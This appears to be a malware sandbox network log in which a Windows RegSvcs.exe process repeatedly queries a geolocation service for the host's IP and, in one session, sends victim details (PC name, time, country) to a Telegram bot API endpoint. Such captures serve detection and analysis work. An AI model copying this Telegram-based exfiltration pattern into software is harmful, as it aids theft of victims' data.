    Date: Wed, 18 Sep 2024 13:26:34 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49700 | 188.114.96.3 | 443 | 3636 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-18 13:26:04 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-09-18 13:26:04 UTC | 718 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:04 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 78315
    Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmXFJcnY5cCFIWEmFHPJ3mog9%2BFsfz7g0UQeCp6Sy3HB%2F0Klxf2HsKYp%2BGPQ0z8m4nKw1maOMFwpWPLmrY%2BYM3%2B58DXurj%2FQKKH%2F%2B8%2Bg6016ApRTqYyrLK6e6MIZHGztb8wguted"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c51aa678eaf0c84-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-18 13:26:04 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-18 13:26:04 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49701 | 188.114.96.3 | 443 | 3636 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-18 13:26:05 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-09-18 13:26:05 UTC | 708 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:05 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 78316
    Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tY6AmZdrD5Yl3TTSSQlncAuMEGE08ONy%2F3JkooHSLJ14bYsLwECT0tiIX8ZkV5UYWVAyfEmdOBloh%2BH6whagCU5dtBYJSZqsR%2F2NsFqYyJvs8VXXinh9YrlPnAskS%2Fewh7ANVX2V"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c51aa6d38df32fa-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-18 13:26:05 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-18 13:26:05 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49703 | 188.114.96.3 | 443 | 3636 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-18 13:26:07 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-09-18 13:26:07 UTC | 700 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:07 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 78318
    Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MlUoaLTPF4HDV2nKNOvLX2XqloS8bQvCDEG8wORl7G7nEYUT3NmjB32fVVyBBqViRLSpZdDtIuNBwq9rF4dyN827kq0XqsWnfGYAJGJpNjC9pR3LLj2PzgkyFL04ZAncVJGaO5vK"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c51aa768b2a0cac-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-18 13:26:07 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-18 13:26:07 UTC | 5 | IN | Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49705 | 188.114.96.3 | 443 | 3636 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-18 13:26:09 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
    Host: reallyfreegeoip.org
2024-09-18 13:26:09 UTC | 704 | IN | HTTP/1.1 200 OK
    Date: Wed, 18 Sep 2024 13:26:09 GMT
    Content-Type: application/xml
    Transfer-Encoding: chunked
    Connection: close
    access-control-allow-origin: *
    vary: Accept-Encoding
    Cache-Control: max-age=86400
    CF-Cache-Status: HIT
    Age: 78320
    Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MwhBJo6Vw3OSzSy8ooo%2Brxdwjv2l6klIHFWkQntUkBUM97acd5gHGy9q1wSdqN1TltQ77LF2W9EhVXRoyradcKhyfRyUDhVqmmyZXVHXhU2VlcfJCDz9po3HJlCowGnT8Ni4%2ByLN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8c51aa86b8274315-EWR
    alt-svc: h3=":443"; ma=86400
2024-09-18 13:26:09 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-18 13:26:09 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 4 | Source IP: 192.168.2.7 | Source Port: 49707 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3636
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:11 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:11 UTC | 712 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:11 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78322
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gyMA%2BICjiAaJypzbbWP%2BJ5a26Wsu2E4EAJoJPYAZ8TJ7SL%2F4L4d0hqbeDoSitJVtPo%2Fr22X98jELCJT%2FHye03baglZrNWwOnBjysWFxjMNJ4%2FoC36hFzMbEQKiUNlr4sqAOfRyto"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa90ebc70f81-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:11 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:11 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 5 | Source IP: 192.168.2.7 | Source Port: 49709 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3636
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:12 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:13 UTC | 710 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:13 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78324
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4WfmheCoftdjWAc0bSL%2BCRW2FfVsKBvNfWptRWl8Q3Ps%2F2lSM2ODW3nGvh9oKYCDrhlfctVKgeNd20qm04%2FRaRYIjHs0Ba74zvZgP5vPc%2Bh6igKNljKlrY%2F46McdiuORHFZBDGli"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aa9b8fa00ccd-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:13 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:13 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 6 | Source IP: 192.168.2.7 | Source Port: 49711 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3636
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:14 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:15 UTC | 708 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:15 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78326
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ebjYTYbGUUhRuRvZ%2FJMPj12SLp3f%2FonlgN61hZjvuE9n3VSRX1GKYjcs7Hz4ZNZdw5RyHFifW7aWdNDvUDkLOp7DMmiKxGAZhL9xNKHmjoikXEVh3WkZmdEgPJuEsvdmHF%2B%2FXxB"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aaa7ec7c423b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:15 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:15 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49715 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3636
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:17 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:17 UTC | 708 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:17 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78328
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xh%2BxFWYsGp%2B7m6HB%2BunJe22eu7GJiLbCOAQsXou8lSDyj%2FBjWoA0KdDofyKxyeom7tCeTqEeXLISPjdpI7WOe3gv9NWuNhR6qaS7mbUQLbzwQ0RADVxPUVUuSwCqejsqnvkuZ05f"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aab7aa938c1d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:17 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:17 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49716 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6480
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:17 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:17 UTC | 702 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:17 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78328
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=evAyOb99OEj8FFjiPKxPIRZ3P0fCM2PCc33Co8XSAiNIiV5kag66Zq1S4SiUg6vD%2F5zKzk3gHSCjqnSQlwa6z7yYgwqY0cCtQT2X7h07uhpgw6VCkBJOGzyTYXXwblltGYZRWJtG"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aab86e28728a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:17 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:17 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49719 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6480
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:18 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:18 UTC | 718 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:18 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78329
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xSURTo%2BiPlILa6BS9zu1AQWWZn%2FmLMA%2F6Zo5%2B%2BcuMiHW0%2F4Xmw%2FfLVdGZp7v4vtOJtlY6UrHyJOaR%2F4tGauar5hHpqvvVflhcHy03xHM%2BBJPYuZD3tpDqUOtHC1CkAODqbUtKn4i"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aabe0bf34386-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:18 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:18 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 49723 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6480
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:20 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  2024-09-18 13:26:20 UTC | 708 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:20 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78331
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5GLGIwnz5Pr7seiZd4jtcO6R9xoRAIwDriZ5GBYpIgrCL1e225UwDWmEYPZPMgbrX7eOnggZu60TyvgQDu9tvbdR%2Fd1Ta%2B3baKise3gOTFn8pfskAOn%2BHszkENDfhrbh3C%2F95mcU"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aacc0fea0c96-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:20 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:20 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49724 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 3636
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:21 UTC | 710 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:21 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78332
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0hSWUzoGZaswoAbca0utCWF0ugx%2BEw739gG0Y5VWtmV1Kx48vSps%2BT2K6rNBay9Mte7tPkJjdmquQ0Q8pzUjeVXwYGNU3tKQGKKx%2BPZ9VK4DvjtKU43au1b%2BehS0%2FuLf4dYDQXF"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aacec9fcc466-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:21 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:21 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID: 12 | Source IP: 192.168.2.7 | Source Port: 49726 | Destination IP: 149.154.167.220 | Destination Port: 443 | PID: 3636
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:22 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2019/09/2024%20/%2002:45:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                  Host: api.telegram.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:22 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                  Server: nginx/1.18.0
                                                  Date: Wed, 18 Sep 2024 13:26:22 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 55
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  2024-09-18 13:26:22 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                  Session ID: 13 | Source IP: 192.168.2.7 | Source Port: 49727 | Destination IP: 188.114.96.3 | Destination Port: 443 | PID: 6480
                                                  Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:23 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:23 UTC | 704 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:23 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78334
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Lx2BlQjSLnMR15cuyh8fY64yiXLRqOUKfV0HZciD8Y4iOkTplGeOytigIxzQAQJbjJQi7o6AD422FGv2yf3ZbdYV4iN6kRFP%2BP3eV8ZACOp2vMFolskv2d9AEat0g%2FAnPT909KD"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aadf4a267ced-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:23 UTC | 340 | IN | Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:23 UTC | 5 | IN | Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  14 | 192.168.2.7 | 49729 | 188.114.96.3 | 443 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:25 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:26 UTC | 712 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:25 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78336
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGIFbMfim7BjNk9QQJbIKyQbPEeewE%2Bp3Ufy%2FeDcvX%2FddulasubAUhhtR5XXcrdu9V4o6FG8OXp7nwv1Dh5LXutV%2BjCs0ki8m8y0AuvtAdq7nhSEvOx5I%2Bs6aFvgxxcAFapH7ZP%2F"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8c51aaec4dcd43ef-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-09-18 13:26:26 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                  Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                  2024-09-18 13:26:26 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  15 | 192.168.2.7 | 49731 | 188.114.96.3 | 443 | 6480 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-09-18 13:26:28 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
                                                  Host: reallyfreegeoip.org
                                                  Connection: Keep-Alive
                                                  2024-09-18 13:26:28 UTC | 708 | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 18 Sep 2024 13:26:28 GMT
                                                  Content-Type: application/xml
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  access-control-allow-origin: *
                                                  vary: Accept-Encoding
                                                  Cache-Control: max-age=86400
                                                  CF-Cache-Status: HIT
                                                  Age: 78339
                                                  Last-Modified: Tue, 17 Sep 2024 15:40:49 GMT
